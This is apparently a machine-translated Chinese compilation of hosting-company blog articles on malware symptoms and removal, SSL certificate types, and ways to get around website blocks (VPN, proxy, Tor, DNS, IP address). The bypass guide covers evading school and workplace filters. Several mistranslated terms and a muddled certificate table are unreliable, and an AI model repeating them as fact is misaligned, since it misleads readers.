- 您的设备无法关闭或重新启动。
- 你发现你的设备正在发送你没有写的电子邮件。
- 程序会自动打开和关闭。
- 没有明显的原因,您的存储空间不足。
- 你的默认浏览器和程序保持变化,而你没有任何动作。
- 性能下降,而电池消耗增加。
- 你会在意想不到的地方看到很多弹出窗口和广告,比如在政府网站上。
- 您无法登录您的网站。
- 你注意到你没有对你的网站进行修改。
- 您的网站重定向到另一个网站。
由于无文件恶意软件非常难以检测,因此您所能做的就是密切关注网络模式并分析易受感染的应用程序。你还需要保持你的软件程序和浏览器更新,并定期搜索任何钓鱼邮件。
如何摆脱恶意软件
如果你被恶意软件感染,重要的是不要惊慌。有几个选项,您仍然可以保存您的设备或网站。请记住,不同类型的恶意软件需要不同的删除程序。
从设备中删除恶意软件
如果您注意到您的计算机或移动设备正在经历一些或所有前面提到的恶意软件感染迹象,请首先确定恶意软件的类型,然后开始采取以下措施:
- 病毒或木马:如果您的设备感染了病毒或木马,您需要安装一个可靠的防病毒或反恶意软件程序,该程序可以执行深度扫描。定期更新你的杀毒软件是很重要的。部署强大的防火墙,点击电子邮件附件和网页链接时要小心。
- 蠕虫:尽管有害,但您可以像清除病毒一样清除计算机蠕虫。安装一个强大的反恶意软件,可以检测蠕虫,让它做所有的工作。如果您的浏览器被感染,请使用不同的计算机,安装您的反恶意软件,并将其刻录到 CD 上。
- 垃圾邮件:如今的电子邮件服务包括反垃圾邮件功能。但是,您仍然可以安装反垃圾邮件软件来帮助您摆脱垃圾邮件,使您受到保护。
勒索软件:如果您的组织不打算支付赎金,您需要为当局记录攻击的证据,然后立即断开受感染的设备。之后,创建一个系统备份如果你仍然可以访问,禁用任何系统清理或优化程序,以保留勒索文件进行诊断。最后,开始使用强大的网络安全软件清除勒索软件,并聘请网络安全专家指导您恢复文件。
- 广告软件:使用具有广告软件删除功能的反恶意软件程序可以清除广告软件。默认情况下,请确保禁用浏览器上的弹出窗口,并禁止安装其他软件。
从 WordPress 网站移除恶意软件
尽管 WordPress 为成长中的企业带来了大量的好处,但它仍然有几个安全漏洞。如果你的 WordPress 网站遭受恶意软件感染,像一个熟练的网站管理员一样按照我们推荐的步骤移除它。
你也应该知道 Kinsta 为我们托管的所有网站提供安全保证,包括免费从你的 WordPress 网站移除恶意软件。
你也可以利用一些安全插件来保护你的网站。
如何保护自己免受恶意软件的攻击
现在你可能已经意识到,恶意软件攻击是一件大事,学习如何保护自己免受恶意软件攻击并避免被感染对个人和企业都是至关重要的。
在大多数情况下,恶意软件感染需要您采取措施,如下载恶意内容或点击受感染的链接。以下是您可以采取的关键预防措施,以避免受到不同类型的恶意软件的攻击。
1.安装反恶意软件或防病毒软件
在您的系统上安装强大的反恶意软件或防病毒软件并定期更新是非常必要的。经常运行扫描,尤其是深度扫描,以确保您的设备没有被感染。反恶意软件程序有不同的保护级别:
- 浏览器级保护:一些网络浏览器如谷歌 Chrome 有内置的反恶意软件保护,让你免受不同恶意软件的威胁。你也可以安装你自己的来保护你的浏览器。
- 网络级防护:如果您的组织内部有一个计算机网络,安装网络级反恶意软件是保护您的连接设备免受来自网络流量的恶意威胁的最佳选择。为此,特别推荐使用防火墙。
- 设备级保护:这些工具有助于保护用户的设备免受恶意威胁。
- 服务器级保护:如果您有一个大型组织,这种类型的反恶意软件可以保护您的服务器网络免受恶意网络攻击。
2.不要打开不可信来源的电子邮件
避免网络钓鱼从一个重要的步骤开始:不要打开带有可疑附件的可疑邮件。
如果你不确定你能遵守这条规则,或者如果你不相信你的员工会遵循这条黄金建议,那么就投资购买电子邮件安全工具。您可以使用反垃圾邮件工具和 S/MIME 证书来保护您的电子邮件通信。
S/MIME 证书是一种基于 PKI 的工具,使您能够与其他 S/MIME 证书用户交换加密和数字签名的电子邮件。这样,你和你的收件人将知道电子邮件是安全和合法的。
3.当心恶意下载和弹出窗口
对于可疑的电子邮件,注意你下载了什么以及从哪里下载是很重要的。点击链接从不受信任的来源下载应用程序或游戏会招致网络罪犯和恶意攻击。
弹出窗口也没什么不同。如前所述,网络罪犯使用操纵的方式来欺骗你点击他们被感染的链接。
4.执行网站和文件安全检查
保护您的网站应该是您的首要任务。无论你的网站是大是小,你都必须定期进行网站安全检查,以避免被任何类型的恶意软件感染。
你也应该密切关注组成你的网站的单个文件。一个可靠且定期执行的文件完整性监控程序可以帮助您在潜在攻击被触发之前发现它们。
如果您的网站不安全,它不仅可能被恶意软件感染,还可能引发对其他网站和用户设备的一系列恶意攻击。更重要的是,它会降低你在谷歌上的搜索引擎优化排名。你最不希望的就是在互联网上开始恶意软件攻击摊牌!
5.维护定期数据备份
在你个人或公司的电脑上备份数据至关重要。尽管备份数据不会保护你免受恶意软件的攻击,但如果你被感染,比如被勒索软件或任何其他恶意威胁感染,它将帮助你恢复数据。
为了执行健康的数据备份,保留您数据的多个副本。最好使用两种不同的媒体类型来存储您的数据文件,以防受到多次攻击。您甚至可以选择在安全的异地位置保存一份数据文件。
摘要
现在,您已经对不同类型的恶意软件以及如何应对它们有了总体的了解,我们强烈建议您投资于可靠和值得信赖的数据安全措施。
我们还建议及时了解最新的网络安全风险,并定期更新您的系统和程序。
你还有其他避免恶意软件的技巧吗?请在评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
SSL 证书的类型:哪一种适合您的站点?
用 SSL 证书保护的网站让访问者知道它是安全的。它也赢得了搜索引擎的认可,确认你的网站可以安全浏览。因此,你必须为你的网站获得一个有效的 SSL 证书。
SSL 是安全套接字层(Secure Sockets Layer)的缩写,它是一种安全协议,通过网络服务器和网络浏览器之间的网络连接对数据进行认证和加密。SSL 证书保护您的站点和访问者之间的连接,防止恶意方的入侵。
SSL 证书有不同的类型、验证级别和价格标签。但是哪种 SSL 最适合您的网站和业务呢?在本指南中,我们深入研究了不同类型的 SSL 证书,以帮助您做出正确的决定。
请继续阅读!
查看我们的视频指南为您的网站选择正确的 SSL 证书
何时以及为什么需要 SSL 证书
无论你经营的是一家电子商务商店还是一个博客,SSL 对于网站来说已经变得和开车前系好安全带一样重要。
以下是您的网站需要 SSL 证书的三个主要原因:
1.数据保护和访问者信任
SSL 证书的主要目的是确保用户和 web 服务器之间交换的数据得到加密,并防止黑客、网络钓鱼和身份盗窃等网络威胁。
您不希望您的访问者在访问您的网站时收到“您的连接不是私人的”警告。有效的 SSL 证书将帮助您避免此类错误。
SSL 的核心是向访问者表明他们可以安全地在您的网站上共享敏感信息,如信用卡号、id、电子邮件地址和密码。因此,SSL 加强了您和您的客户/访问者之间的信任。
2.认证和完整性
当你访问一个网站时,你如何确保它是正确的,而不是一个窃取你信息的骗局?当涉及到 web 安全时,身份验证是必不可少的,这就是 SSL 的用武之地。SSL/TLS 验证 web 服务器身份的真实性。
要安装 SSL 证书,您必须通过身份验证过程。换句话说,SSL 可以证明你的网站确实是你的网站,而不是你公司的欺骗或假冒,这使它成为抵御钓鱼网站的有效屏障。看看你如何验证你的 SSL 证书。
数据完整性是 SSL/TLS 的另一个重要优势。使用消息认证码(MAC),SSL/TLS 确保传输的数据不会丢失或以任何方式更改。发送的消息按原样接收。
要了解更多信息,请阅读我们解释 SSL 和 TLS 之间差异的文章。
3.提高搜索引擎排名
为了让网络浏览对所有人来说都更安全,像谷歌这样的搜索引擎已经打击了不安全的网站,并明确表示他们更喜欢 SSL 加密的网站 HTTP,而不是 HTTP。SSL 将超文本传输协议(HTTP)转变为安全超文本传输协议(HTTPS)。
SSL 现在是一个 SEO 排名信号。所以,如果你想让你的网站出现在谷歌的首页,拥有一个有效的 SSL 证书是必须具备的条件之一。
一个用 SSL 证书保护的网站让访问者知道它是安全的,并赢得搜索引擎的认可🔒了解如何为您的网站选择合适的⬇️ 点击推文
SSL 证书如何工作
我们已经确定 SSL 可以加密并保护托管服务器和访问者应用程序(web 浏览器或应用程序)之间的连接。
How SSL certificates work. (Source: Entrust)
如果您想知道这是如何工作的,我们将探索一个例子。
让我们以您的网站为例,假设它是用 SSL 证书保护的。当一个人使用网络浏览器访问你的网站时,他们的浏览器会要求你网站的主机服务器识别自己。
服务器将通过向浏览器发送其 SSL 证书的副本来做出响应。浏览器还将进行一些验证检查,以验证 SSL 证书是否可信,并向服务器发送信号。
作为回报,服务器会以数字方式作出回应,在您的网站和访问者的浏览器之间开始 SSL 加密会话。
SSL 证书的类型
有两个不同的类别来区分 SSL 证书的类型—域和子域的数量,以及证书的验证级别。因此,有四种不同的 SSL 证书类型:
单域 SSL 证书
顾名思义,这种类型的证书保护一个单个域和该域上的所有页面。但是,它不会保护任何关联的子域。
例如,如果你有一个域*kinsta.com*的 SSL 证书,它也会覆盖所有与这个域相关的页面,比如*kinsta.com/knowledgebase/*。但它不会覆盖任何子域,如*my.kinsta.com*。
通配符 SSL 证书
与单域 SSL 证书一样,通配符 SSL 证书仅保护单个域。然而,它还涵盖了与该单个域相关的任何子域(无限数量的子域)。单个通配符 SSL 证书可以保护所有这些。
多域 SSL 证书
该证书的目的与通配符 SSL 证书完全相反,因为它保护多个域的安全,但不保护任何相关的子域。它也被称为主题别名(SAN)和统一通信证书(UCC)。
多域通配符 SSL 证书
多域通配符 SSL 证书结合了多域和通配符 SSL 证书的功能。换句话说,用一个证书,你可以保护多个域以及所有相关的子域。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
SSL 验证级别
SSL 证书验证级别由证书颁发机构(CA)指定,该机构在向您颁发 SSL 证书之前验证您的业务真实性。
SSL 证书有三种不同的验证级别:
域验证(DV) SSL 证书
DV 是 SSL 证书验证的最简单形式,仅适用于域所有权验证。这通常是通过电子邮件验证完成的,不需要 CA 的任何进一步调查。这也是获取 SSL 证书最便宜、最快的方式。
组织验证(OV) SSL 证书
在验证方面,OV 更上一层楼。除了验证您的域,CA 还通过直接联系您或您的企业来验证您的企业。CA 验证您拥有该域,并且它是合法注册的企业。这些证书被认为是非常可靠的。
扩展验证(EV) SSL 证书
EV 是商业网站中的典型,提供最高级别的信任和可靠性。它包括对你的企业进行全面的背景调查。获得该证书需要通过 CA 的严格审查过程。
在某些浏览器上,带有 EV SSL 证书的企业名称会突出显示。当访问他们的网站时,他们会在域名旁边显示为绿色。
| SSL 证书类型 | 验证级别 |
| 单域 | DV 还是 OV |
| 通配符 | DV 还是 OV |
| 多域 | 电子伏特(electron volt) |
| 多域通配符 | 电子伏特(electron volt) |
不同 SSL 证书的优点和缺点
就安全性而言,用 SSL 证书来保护你的网站没有任何坏处。然而,每种类型的证书都有其优点和缺点,使每种证书适合不同的目的或需要。
让我们来看看上面讨论的不同 SSL 证书的优缺点。
从单域 SSL 证书开始,最显著的优势是它是最经济实惠的证书类型,并且覆盖了与域相关的所有页面。唯一的挫折是它不能保护任何子域。
厌倦了没有答案的乏味的网站托管支持?试试我们世界一流的基础设施和支持团队!查看我们的计划
通配符 SSL 证书更昂贵,但它涵盖了单个域、所有相关页面和第一级无限数量的子域。不幸的是,它没有涵盖任何二级子域。
多域 SSL 证书同时覆盖多个域。尽管它们看起来很贵,但您只需要获得一个覆盖所有域的证书,而不是为每个域获得一个 SSL 证书,这样更划算。
具有这两种类型的优点,多域通配符 SSL 证书在第一级覆盖多达 100 个域和无限个子域。它唯一的缺点是价格昂贵。但是和多域 SSL 证书一样,通配符 SSL 对于大型网站或者商家来说是非常划算的。
如何选择正确的 SSL 证书
如图所示,SSL 证书有不同的风格。如果你想让你的网站看起来合法,并得到访问者的信任,但不确定哪种 SSL 证书能满足你的需求,我们将帮助你做出正确的选择。
-
对于只有一个域的小型或个人网站来说,单域 SSL 证书更适合你,因为它价格合理,而且很管用。
-
如果你的商业网站只有一个域名,但有多个子域,那么通配符 SSL 证书是一个不错的选择,比每个子域都获得一个单独的 SSL 证书要便宜得多。
-
对于较大的网站或拥有多个域的企业(例如,拥有多个品牌的公司,每个品牌都有自己的域),多域 SSL 证书是明智的选择。它将覆盖你所有的域名,并且肯定比每个域名获得一个 SSL 证书要便宜。
-
如果您的组织想要节省时间和金钱,多域通配符 SSL 是保护多个域和无限数量子域的理想选择。
为了便于参考,这里有一个简要的表格,列出了每种 SSL 证书类型的优点:
| SSL 证书 | 支付能力 | 优势 | 不足之处 | 最适合 |
| 单域 | 最便宜最实惠 | 保护单个域的经济性 | 不保护子域 | 只有一个域的小网站 |
| 通配符 | 比单域 SSL 贵,但更具成本效益 | 在一级保护无限的子域名 | 它只涵盖了一个子域级别 | 具有单个域和多个子域的中小型网站 |
| 多域 | 昂贵的 | 用一个证书保护多个域 | 必须在颁发此证书之前定义域 | 拥有一个以上域名的大型商业网站 |
| 多域通配符 | 最贵,但也是性价比最高的 | 单个证书在第一级保护多个域和无限的子域 | 昂贵的和任何改变域和子域将需要重新颁发此证书 | 拥有多个域和子域的大型网站/企业 |
访问者如何知道你的网站是否有 SSL 证书
您的访问者可以很快知道 SSL 证书是否保护您的网站,以及您的 SSL 证书是否有效。我们会告诉你怎么做。
看看 Kinsta 主页的地址栏,你会看到一个小挂锁。这意味着我们的网站是 SSL 安全的。
如果你使用的是谷歌浏览器,点击挂锁标志并选择“证书”现在,您将看到您需要了解的关于安装在我们的 Kinsta 网站上的 SSL 证书的所有细节:谁发布了它,它属于谁,以及它的有效日期。
除了小挂锁符号,你会注意到地址栏中的 URL 以 HTTPS 开头(在一些浏览器中默认是隐藏的)。HTTPS 表示,我们网站上的连接是安全的,它有一个授权的 SSL 证书。
浏览器地址栏中 HTTPS 的位置。
你是否在网站上安装了 SSL 证书,但访问者却遇到了NET::ERR _ CERT _ AUTHORITY _ INVALID错误?没必要惊慌——查看这个详细教程来学习如何修复这个错误。
SSL 证书的成本
SSL 证书的费用从免费到掏钱不等,取决于证书的类型、验证级别和购买地点(例如 Comodo、VeriSign、GeoTrust 等)。).
所有托管在 Kinsta 的 WordPress 站点都受到我们的 Cloudflare 集成、、的保护,其中包括带有通配符支持的、免费 SSL 证书。
在投资高级或付费 SSL 证书时,DV 和单域 SSL 证书的成本是最实惠的。
随着您的业务需求的增长和您在 SSL 阶梯上更上一层楼,您会发现通配符 SSL 证书的成本会更高。相比之下,OV 和 EV SSL 证书是最昂贵的,并为组织和企业提供最高的加密。
摘要
几乎每个网站都广泛采用 SSL 证书来保证安全的互联网连接。随着网络威胁的增加,难怪它会被流行的搜索引擎严格执行。
现在,您对不同类型的 SSL 证书及其各种验证级别有了清晰的了解。我们希望它能帮助你选择最适合你的网站的 SSL 证书。
使用 SSL 证书保护您的网站后,请执行 SSL 检查以验证一切正常。从 HTTP 迁移到 HTTPS 需要很多改变,所以也请阅读我们的 HTTP 到 HTTPS 迁移指南。
关于选择正确的 SSL 证书,您有什么问题吗?请在评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何解锁网站:2022 年终极指南
被屏蔽的网站是网络世界的不幸现实——以至于几乎每个人都会在某个时候遇到屏蔽。令人欣慰的是,有大量方便的工具和方法可以绕过封锁,访问受限制的内容。
如果你不能访问你最喜欢的网站,你并不孤单。超过 76 % 的互联网用户生活在至少有某种形式的网络审查的国家。此外,即使你不住在有审查制度的地方,你也可能会遇到来自工作、学校和其他地方的阻碍。
在本指南中,我们将深入探讨可用于从任何设备解除网站封锁的许多工具和方法。然而,在我们这样做之前,我们首先必须找出你最喜欢的网站为什么(以及如何)被屏蔽。请继续阅读以了解更多信息,并开始解除封锁。
为什么我被阻止访问某个网站?
虽然阻止可能有很多原因,但通常是因为有人试图阻止你访问某个网站或应用程序。
Example of a blocked website
大多数屏蔽分为三大类:被你正在使用的网络(如你工作或学校的 WiFi)屏蔽,或被网站本身屏蔽。最后,你的互联网服务提供商(ISP)或政府可能会屏蔽你。
无论遇到什么情况,通常都有解决方法。但是,您使用的解决方法取决于块的类型和您试图访问的内容。请继续阅读,了解更多关于不同类型的块以及可以用来绕过它们的工具。
被你的工作或者学校挡住了
几乎每个人都有过被工作或学校屏蔽的内容。但是为什么这些块在适当的位置,它们是如何工作的?
原因很容易猜测:学校和工作场所在保持学生和员工的生产力方面有既得利益。因此,他们对某些类型的网站,如社交网络和在线游戏,设置了重重的屏蔽。
通常,你的学校或工作网络会通过 URL 屏蔽网站。这意味着每当你在浏览器中输入一个地址,网络就会将这个地址与其黑名单进行比较。如果该地址在阻止列表中,它会限制访问并阻止您。
绕过这些障碍的常见方法是通过第三方,如代理或虚拟专用网络(VPN)重新路由您的浏览。
它被政府封锁了
正如我们在本文开头提到的,世界上大多数人口面临着政府强加的封锁。但是为什么呢?
确切的答案可能各不相同,但都归结为一个共同的趋势:政府在维护其在公民中的声誉方面有既得利益。因此,许多政府限制访问分享关于过去事件的尴尬或罪证信息的网站。
政府封锁最著名的例子之一是中国的“防火长城”,它在 20 世纪 90 年代初互联网首次进入中国后迅速实施。防火墙的目的是阻止违反中国宪法和审查目标的外国网站和跨境流量。
由于防火长城,中国近 15 亿人口无法访问谷歌和脸书等热门网站。然而,这并没有阻止他们: 29 % 的中国互联网用户绕过了 VPN 的封锁。
当然,中国远不是唯一限制公民上网的国家。然而,无论哪个国家,屏蔽通常都是一样的,政府网络根据 URL 和主机 IP 地址过滤网络流量。
VPN 通常是绕过政府封锁的最佳方式。但是,有些用户可以通过使用代理和其他方法来获得。
它被您的 ISP 阻止了
虽然不像我们到目前为止讨论的其他类型的阻止那样常见,但许多用户面临来自他们的互联网服务提供商(ISP)的阻止。
虽然 ISP 阻止的原因可能各不相同,但通常都是为了阻止可能违反当地法律或提供商服务条款的网络流量。与政府级别的“硬块”相比,ISP 的“软块”通常更容易通过 VPN、代理和其他方法绕过。简单的切换 DNS 服务器甚至可以绕过一些 ISP 屏蔽。
许多互联网用户甚至没有意识到他们被 ISP 屏蔽了。一个常见的原因是,这些区块可以是一个有价值的附加服务,旨在保护您的浏览体验。然而,一些 ISP 也可能会限制访问以保护自己的利益。
但是你怎么知道你的 ISP 是否落后于一个街区呢?虽然这并不总是很容易辨别,但如果您无法访问在其他方面不受限制的网络上的网站,您通常可以断定某个阻止来自 ISP。例如,如果你生活在一个没有审查制度的国家,并且没有使用工作或学校网络,那么你遇到的任何屏蔽都可能来自你的 ISP。
这是地理限制的
许多网站阻止来自整个国家或地区的流量。也被称为"geo-restriction,“这种类型的阻止在网飞、YouTube、Prime Video 等流媒体服务中很常见。
YouTube video unavailable due to geo-restrictions
为什么要阻止外国交通呢?尤其是流媒体服务,还必须遵守规定哪些国家和地区可以访问特定内容的分发法律。这些法律就是为什么当你进入一个新的国家时,你的网飞经历经常会改变——即使是出于同样的原因。
正如你可能已经猜到的,绕过地理限制需要从一个“批准”的国家访问网站。虽然这在没有旅行的情况下似乎是不可能的,但 VPN 和代理通过远程外国服务器重新路由您的流量来提供这种能力。
其他网站的另一个原因是太多的外来流量会淹没服务器资源。
你被禁止了
有时候屏蔽来自网站本身。Omegle 和 Twitter 等许多热门网站可以禁止违反服务条款或促进非法活动的用户。
在这种情况下,很容易判断你是否被禁止。但是你怎么能避开它呢?
答案因网站和封禁方式而异。Twitter 等基于账户的服务将直接禁止账户本身,这意味着你无法通过使用 VPN 绕过它。相反,你必须创建一个新账户。
然而,许多禁令是基于用户的 IP 地址。网站可能会禁止来自用户的 IP 地址的所有流量,而不是禁止一个账户。VPN 和代理是绕过这些禁令的好方法,因为它们可以通过重新路由你的流量来有效地改变你的 IP 地址。
你能解锁一个网站吗?
是的,但是它取决于街区。VPN 和代理通常可以绕过大多数限制,但这并不总是有保证的。
正如我们将在下一节中看到的,解除阻塞的能力在不同的提供商和软件包之间会有很大的不同。让事情变得更加困难的是,许多流行的 web 服务一直在寻找 VPN 和代理服务器 IP,这导致了维护大量功能地址的无休止的斗争。
令人欣慰的是,即使 VPN 或代理对某项服务不起作用,仍然有很多方法可以绕过屏蔽。请继续阅读,了解更多关于 VPN、代理和一些有效的替代方法来解除对您最喜爱的网站的封锁。
解除网站封锁的四大方法
VPN 和代理是解封网站最流行和最有效的工具。然而,许多用户也从匿名浏览器如 DuckDuckGo 获得了很好的结果。虽然有许多其他方法来解除网站封锁,这四个是最广泛使用的。
1.虚拟专用网络
VPN 是目前最流行的解封网站的工具。然而,绕过块只是其功能的副产品。
顾名思义,虚拟专用网通过自己的一套安全服务器来重新路由您的流量,有效地将您的家庭、学校或工作场所的专用网络扩展到虚拟公共网络上。换句话说,在你的流量通常会被直接发送到一个网站的地方,VPN 作为“中间人”介入,获取你的数据并重新发送。
与代理不同,VPN 还会对你的流量进行加密。因此,您的流量和您的身份都保持隐私和安全。正如我们稍后将看到的,这是访问被屏蔽网站的部分关键。
How a VPN works (Source: Yellowstone Computing)
这个过程听起来可能有点复杂,但实际上相当简单:
- 你打开桌面上的 VPN 客户端或者网络浏览器。
- VPN 客户端对您的出站流量进行加密。根据提供商的不同,您还可以指定哪些应用程序将使用 VPN(此选项称为“切分通道”)。
- 你的加密流量被发送到 VPN 的安全服务器网络。像任何连接一样,您的流量被分成“数据包”,每个数据包包括源和目的 IP 地址。在这里,源 IP 地址是您的私人家庭、工作或学校网络。
- VPN 服务器会从每个数据包中删除您的源 IP 地址,并用自己的地址替换它。这样做,接收端会认为你的流量来自 VPN 服务器,而不是你的电脑。
- 你的流量被解密并被接收者接收,他不会知道它的真实来源。
好吧,也许不完全简单。然而,你可能不需要担心这个过程的细节。一旦它启动并运行,当 VPN 在幕后加密和重新路由你的流量时,你将能够正常浏览。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
这当然很好,但是这个过程如何解除网站封锁呢?
答案就在你的 IP 里。由于许多屏蔽和禁令都是基于 IP 的(网站用它来推断你的位置),在重新路由期间替换你的 IP 地址通常足以逃过限制。然而,由于大多数主要网站不断试图阻止来自已知 VPN 服务器的访问,提供商需要维护大型分布式服务器网络,以确保访问安全。
然而,不同的 VPN 提供商之间的服务器数量和功能差异很大。即使快速搜索 VPN 也会产生数百个不同的选项,每个提供商都有不同数量和种类的服务器。
正如你所想象的,价格也随着性能而变化,顶级提供商每月收取 10 美元或更多的费用来使用具有数千个安全 VPN 服务器的网络。虽然有一些免费的 VPN,但它们通常并不健壮——许多人转向代理寻求免费解封。
2.代理人
像 VPN 一样,代理也通过自己的服务器重新路由流量——但有一些关键的区别。
最大的区别是代理不像 VPN 那样加密数据。因此,你的流量对第三方来说是完全可见的,如果你使用的是声誉不佳的提供商,这会带来额外的安全风险。用户在使用代理时输入密码或发送其他安全信息时应该小心。
How a proxy works (Source: Medium)
大多数代理提供的服务器也比一般的 VPN 提供商少得多。虽然您仍然可以取消阻止网站,但它们可能不会像使用 VPN 那样可靠。
然而,这些缺点并不意味着代理没有他们的位置。由于免费且广泛可用,代理提供了一种快速解锁网站和保持匿名的方式。当发送安全数据时要小心,并准备好尝试许多不同的服务器,然后才能访问受限制的内容。
3.VPN/代理浏览器扩展
许多 VPN 和代理也可以作为浏览器扩展(而不是成熟的软件工具)。
Using the NordVPN browser extension
这些都是解除网站封锁的绝佳选择。传统的 VPN 会重新路由你的整个连接,而不是从单个应用程序发送的流量。虽然一些提供商确实允许用户挑选哪些应用程序使用 VPN 网络,但你可能需要为这一特权支付额外费用。
浏览器扩展的另一个好处是,它们不会降低你其他应用程序的连接速度。由于 VPN 在源和目的地之间增加了一个额外的步骤,所以总是会出现稍微慢一点的连接。但是,如果只有 web 浏览器在使用 VPN,那么当您从浏览器取消阻止网站时,您将保持其他应用程序的高连接速度。
然而,对于代理人来说,这种差异并不显著。因为大多数代理通常是免费的,而且经常被过度使用,所以连接速度几乎没有差别,除非浏览器扩展提供对高级代理服务器的访问。
4.突岩
Tor 是“洋葱路由器”的简称,是一个免费的开源网络,致力于保持在线匿名。虽然它的主要目的是隐藏你的身份,但它也有通过其庞大的中继网络重新路由你的流量来解除网站封锁的好处。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
The Tor browser home page
虽然这听起来很像 VPN 或代理,但并不完全相同。在 VPN 和代理使用专用服务器的地方,Tor 网络依赖于一个完全由志愿者运行的大型覆盖网络。
当你使用 Tor 时,你的流量和数据会通过至少三个志愿者中继站重新路由,直到没有识别信息留下。截至 2022 年,Tor 网络拥有超过6000 个继电器。
使用 Tor 网络既免费又简单。您可以通过下载 Tor 浏览器并简单选择连接来访问网络。虽然有些国家会屏蔽 Tor 本身,但您可以通过配置 Tor 在下载过程中使用自己的网络来绕过这些屏蔽。安装完成后,您就可以开始工作了。
然而,Tor 也有一些缺点。为了保护您的身份隐私,Tor 浏览器通常会阻止媒体插件(如 Flash ),这些插件可能会被操纵来泄露身份信息。类似地,它还会自动禁用脚本,导致功能稍微不丰富的浏览体验。
取消阻止网站的其他方法
虽然使用 VPN、代理和 Tor 网络都是解锁网站的好方法,但它们不是唯一的选择,在某些情况下甚至没有必要。
在购买高级 VPN 或者用 Tor 替换你最喜欢的浏览器之前,考虑一下这些更简单的选择。
从 HTTP 切换到 HTTPS
解封某些网站最简单的方法之一就是简单地切换到它的 HTTPS 版本。为此,只需将 URL 中的“http://”替换为“https://”。
HTTPS in an address bar
如今,这不是一个万无一失的解决方案,因为 HTTPS 已经成为大多数网站的标准。但这可能是绕过工作或学校网络障碍的有效方法。
在这种情况下,管理员在将网站添加到网络的阻止列表时,通常会指定一个完整的 URL(例如,http://www.blocked-website.com/)。管理员可能会忘记包括 HTTPS 变体,这为您提供了一个方便的解决方法。
使用网站的 IP 地址
类似于切换到 HTTPS,你也可以尝试使用网站的 IP 地址,而不是它的网址。
要找到一个网站的网址,请使用此处列出的任意一种方法。只需在你的浏览器中输入 IP 地址,你应该能够访问该网站,除非你的网络管理员已经做了尽职调查,也阻止了该 IP。
例如,谷歌主页的几个 IP 地址之一是 172.217.204.102。试着在你的浏览器中输入这个地址,而不是 google.com——你会在同一个地方结束。
URL 缩写
像 TinyURL 这样的网址缩写提供了另一种绕过某些区块的方法。
这些服务采用一个现有的网址,并返回一个缩短的版本,自动重定向到原来的网站。这样,您只能连接到缩短的 URL,而不能连接到原始的 URL,原始的 URL 可能会被管理员阻止。因此,URL 缩写有时可以对基于 URL 的阻止和阻止列表起作用,这取决于它们是如何实施的。
更改您的 DNS 服务器
如果您已被 IP 禁止,切换到不同的域名系统(DNS)服务器是取消阻止网站的有效方法。
不要太专业,您的 DNS 服务器负责将 URL 链接到它们的 IP 地址(例如,google.com 到 172.217.204.102)。由于专用网络和 ISP 从他们的 DNS 服务器管理块,切换到公共服务器通常是一个很好的解决办法。
Switching to Google’s public DNS
您可以通过在电脑的网络设置中输入 IP 地址来切换到不同的 DNS 服务器。最受欢迎(也容易记住)的选择之一是谷歌的公共 DNS 服务器,它的 IP 地址是 8.8.8.8。
在线翻译
向在线翻译者提交一个网址,比如谷歌翻译提供了一个替代链接,可以避开许多屏蔽过滤器。只需在翻译字段中输入 URL,选择您的语言,让翻译器发挥它的魔力。
缓存和网站档案
谷歌缓存和 archive.org 的 Wayback 机器存储了他们抓取的每个网站的副本,这些副本可供公众使用。由于您不需要原始 URL 来访问缓存的网站,因此这是查看被阻止网站的有效方法——尽管是旧版本。
要访问一个网站的缓存版本,你可以谷歌搜索网址,从结果中访问缓存,或者搜索 Wayback 机器。
Opera 浏览器
Opera 浏览器包括一个免费的内置 VPN,使其成为一种快速简单的方式来取消阻止网站,而无需购买昂贵的订阅。然而,要小心:根据一些评论,这不是保护你的隐私或访问网飞等流媒体服务的最佳选择。
尽管有许多方法可以解除网站封锁,VPN 仍然是最流行和最有效的解决方案。顶级提供商提供遍布全球网络的数千台服务器,VPN 是访问受限内容甚至保护您隐私的绝佳方式。
然而,代理、Tor 和我们已经讨论过的其他工具和方法在许多情况下也可以做得很好。不管你用什么,记住解封网站的关键是要么改变你的 IP 地址,要么尝试一个替代的网址。
寻找更多有用的提示?访问 Kinsta 博客获取安全浏览、托管 WordPress 托管、应用托管、数据库托管等方面的最新提示。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何卸载 WordPress 插件(正确的方法)
